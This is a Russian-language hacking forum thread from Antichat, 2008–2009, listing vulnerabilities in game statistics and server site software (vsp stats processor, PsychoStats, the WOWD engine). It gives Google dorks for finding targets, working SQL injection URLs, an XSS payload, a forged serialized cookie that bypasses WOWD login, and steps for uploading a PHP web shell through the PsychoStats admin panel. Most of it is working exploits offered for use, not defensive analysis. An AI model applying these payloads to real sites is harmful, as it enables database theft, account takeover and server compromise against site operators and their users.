[ Уязвимости статистики для онлайн игр ]

Discussion in 'Веб-уязвимости' started by halkfild, 16 Jan 2008.

  1. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    название: vsp stats processor
    версия: 0.45 /*старше не встречал*/
    dork: "powered by vsp stats processor"
    тип уязвимости: SQL-injection


    пути могут вариироватся

    вывод
    смотрим куда можна вывести

    5.0.22::[email protected]::cod2stats

    вывод красивый..смотрим.. /*красивый потому, что видно сразу весь вывод, не нужно лимитом*/

    поля и таблицы системы


    p.s. админки тут как таковой нет.. поэтому использовать можно для вывода других таблиц или если есть права на заливку/чтение файлов
    p.p.s. используется на серверах провайдеров /*локалки и тд*/
     
    _________________________
    9 people like this.
  2. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    PsychoStats

    PsychoStats
    Google d0rk: "Powered by PsychoStats"


    [Full-disclosure] PsychoStats 3.0.6b and prior
    PsychoStats v3.0.6b Multiple Cross-Site Scripting Vulnerabilities
    ранее была ксс в логине

    [SQL-injection]
    Удалённый пользоваель может выполнить произвольный SQL-запрос.
    Уязвимости существуют из-за:
    отсутствия проверки параметра id в скрипте map.php
    отсутствия проверки параметра id в скрипте weapon.php
    Пример использования:


    p.s. ранее выкладывалось на ачате по кмс
    https://forum.antichat.ru/showpost.php?p=464066&postcount=3159
    http://video.antichat.ru/file250.html
    з.з.ы. более ранние версии не рассматривались


     
    _________________________
    #2 halkfild, 16 Jan 2008
    Last edited: 17 Jan 2008
    4 people like this.
  3. z00MAN

    z00MAN Banned

    Joined:
    20 Nov 2008
    Messages:
    360
    Likes Received:
    276
    Reputations:
    41
    PsychoStats

    Google d0rk: "Powered by PsychoStats"
    Multiple Remote SQL Injection Vulnerabilities

    PsychoStats v2.3
    SQL
    Code:
    www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
    PsychoStats v2.3.1
    SQL
    Code:
    www.site.com/map.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,user(),13,14,15,16,17--
    PsychoStats v2.3.3
    SQL
    Code:
    www.site.com/weapon.php?id=1+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* 
     
    #3 z00MAN, 27 Jan 2009
    Last edited: 27 Jan 2009
  4. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    PsychoStats v3.1

    XSS in PsychoStats v3.1
    PHP:
    /admin/login.php?ref="><script>alert("XSS by Gromoza")</script>
     
  5. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    WOWD Движок сайта WoW

    PHP:
     function check()
        {
            if(isset(
    $_COOKIE[$this->config['site_cookie']])){
                list(
    $cookie['user_id'], $cookie['password_hash']) = @unserialize(stripslashes($_COOKIE[$this->config['site_cookie']]));
                if(
    $cookie['user_id'] < 1)return false;
                
    $res $this->DB->selectRow('realmd'"SELECT * FROM account WHERE `id` = ?d"$cookie['user_id']);
                if(
    $cookie['password_hash'] == $res['sha_pass_hash']){
                    unset(
    $res['password']);
                    
    $this->user $res;
                    return 
    true;
                }else{
                    return 
    false;
                }
            }else{
                return 
    false;
            }
        }
    красивая дырень :)
     
  6. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    Может ктониить подсказать, как ее раскрутить. Я как понял есть какая-то возможность sql-injection через куки провести, или я не так все понял?
     
  7. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    вся фишка в @unserialize и
    PHP:
    if($cookie['password_hash'] == $res['sha_pass_hash']){
    этом условии
    когда зарегаешся на двишке получиш подобные плюшки
    Code:
    wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%226106%22%3Bi%3A1%3Bs%3A40%3A%2258c3f53a0b2e80dd3c2990a8d3c691a16c78b9dd%22%3B%7D
    
    меняеш на
    Code:
    wowduser=a%3A2%3A%7Bi%3A0%3Bs%3A3%3A%22[тут id пользователя без квадратных скобок]%22%3Bi%3A1%3Bb%3A1%3B%7D
    
    возможна и скуль, но слепая
     
    1 person likes this.
  8. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    Спс за ответ. Можеш еще подсказать в каком файле эти строчки? Просто скачал движок, пока не нашел) Взарание спс)
     
    #8 bq1foe, 23 Jun 2009
    Last edited: 23 Jun 2009
  9. chekist

    chekist Elder - Старейшина

    Joined:
    14 Nov 2007
    Messages:
    215
    Likes Received:
    160
    Reputations:
    100
    вроде function.php , точно не помню, а ты откуда скачал версия может быть другой
     
  10. bq1foe

    bq1foe Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    38
    Likes Received:
    8
    Reputations:
    0
    chekist, качал вроде с _http://mangos.ru/forum точнее не скажу, уже не помню. Покавыпялся в нем на сайтах, походу версий его немерено и мало кто использует встроеную в него панель управления аккаунтом, а жаль =(
     
  11. InFlame

    InFlame Banned

    Joined:
    27 Oct 2008
    Messages:
    207
    Likes Received:
    32
    Reputations:
    0
    Заливка шелла через админку в PsychoStats 2.3.x

    Заходим в админку > значки, переименовываем шелл в что-то типо shell.PHP.asdgif, заливаем. Главное чтобы расширение оканчивалось на gif (jpg, png). Вот, собственно, и получаем шелл: www.target.com/[path]/images/icons/shell.PHP.hgfgif.
    Из-за неизвестного расширения Apache интерпритирует файл, как php-скрипт (если перед этим неизвестным расширением стоит .php.).
     
    #11 InFlame, 6 Jul 2009
    Last edited: 6 Jul 2009
    1 person likes this.
  12. mr.crown

    mr.crown New Member

    Joined:
    21 Apr 2007
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Можно и пхп залить.
    Заходи в Config->Images->Search list for static images
    Там будет написано: png, jpg, gif
    добавь через "," php и заливай php
    да и работает на 3.1